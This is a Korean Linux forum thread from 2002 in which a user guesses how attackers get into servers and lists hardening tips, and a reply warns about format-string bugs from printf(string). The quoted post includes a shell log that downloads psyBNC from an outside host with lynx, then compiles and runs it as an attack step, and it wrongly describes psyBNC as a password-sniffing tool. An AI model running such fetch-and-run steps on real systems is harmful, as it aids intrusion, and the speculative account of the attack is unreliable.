>> Delete Reply from No. 57941 article
No. RE: psybnc해킹툴과 해킹방법을 알자.

등록 2002-09-30 17:53:00 By localhost     조회 5
이름 Shady    

		세그멘테이션 fault
글쎄 format string 공격도 있습니다.
다만 스택구조를 확실히 알아야하지만.
printf(string)
이라는 간단한 문법은 프로그램만 들때 자제하시길.
물론 현제 책에는 이렇게 나오는게 없지만
예전 책이나 프로그램 보면 이런걸쓰는경우가 간혹있습니다.
아파치의 경우도 예전에 이런 공격으로 문제가 됬었죠.
리눅스 해킹툴은 잘 찾아볼수가 없는데.
윈도우 해킹툴은 홍커에 의해 만들어진 것이 엄청나더군요.
 그리고 저도 들었는데 core파일은 참 무서븐것이라더군요.
 ^^ 좋은하루되세요 :)
    : 안녕하세요?
:
: psyBNC란 해킹툴에 대해 알아도, 알고도, 설명하지 못하거나 답변하지 못하는
: 분들은,.. 뭐하시는 분들일까요?
: 오늘 psybnc답변좀 검색해 볼라구 했더니 없네요....
:
: 누가 그러더라구요... 왜 비싼 썬장비를 쓰냐면, 리눅스는 보안이 엉망이지않냐~!
:
: 리눅스 포럼사이트 들이 왜 해킹툴에 대한 언급은 하나도 않할까요?
: 정말 필요한건데,.. 적을 알고 싸워야 이기죠!~
:
: 암튼,..
:
: 해커의 침임방법은 다양합니다.
: 그중 계정없이 접속하는 방법을 잘은 모르지만, 추정해 보려고 합니다.
:
: 1. 열려있는 ftp를 탐색한다.
: 2. ftp서버를 통해 세그멘테이션 fault를 유발시켜 자신이 원하는 core파일을 생성시킨다.
: 3. 생성된 core를 통해 원격으로 계정을 생성한다.(보통 CGI 인터페이스를 사용함)
: 4. 생성된 계정으로 접속을 시도한다.
: 5. 본격적인 루트 계정을 얻기위해 psyBNC같은 툴을 다운로드 받는다. 아래는 example이다.
: --------------------
: ls
: wget
: help
: lynx
: lynx http://www.psychoid.lam3rz.de/psyBNC2.3.tar.gz : ls
: lynx http://www.psychoid.lam3rz.de/psyBNC2.3.tar.gz : ls
: clear
: ls
: tar -zxvf psyBNC2.3.tar.gz
: ls
: cd psybnc
: make
: ls
: ./psybnc
: --------------------------------------------
: 6. 위에서 보면, shell 커멘더라인에서 lynx란 text http 클라이언트를 통해 해킹툴을 다운로드
:  받는것입니다. 7. 그리고 툴을 컴파일하고, 실행하면, 툴이 동작합니다.
: 8. 물론, 툴이 하는일은 단순합니다. 시스템운영자가 사용하는 패스워드 계정 IP등 모든 
: 정보를 tcpdump를 통해 자신이 지정한 서버로 송신하는 것이겠죠.. 9. 헐.. 그럼. 해킹완료..
:
: 써글...넘들..
:
: --- 보안/대처 방법 ---
: 1. 방화벽을 설치하고, 불필요한 데몬은 모두 죽인다.
: 2. 특히 ftp는 필요하지 않으면 죽이고, 필요하면 철저하게 패치된 ftp서버를 사용한다.
: 3. 서버를 정기적으로 점검한다. 모르는 계정이 있거나 passwd, shadow, group등의 파일에
: 모르는 라인이 있으면 바로 삭제한다.
: 4. 특히 ps, netstat, ls 등 중요한 유틸리티는 백업해 두었다가 정체불명의 프로세서나 포트
: 등의 탐색에 지장이 없도록 한다. 왜냐면, 해커들은 자신의 툴을 감추기 위해 ps, netstat, ls
: 등의 파일도 변경하는 경우가 있다.
:
: 이상입니다.--함 즐겨보자.
[관리자] 패스워드를 입력 하십시오. 답장이 존재하면 함께 삭제됩니다.[ 목록 | 이전 ]
패스워드:    

Copyleft 1999-2026 by JSBoard Open Project
Theme Designed by IDOO All right reserved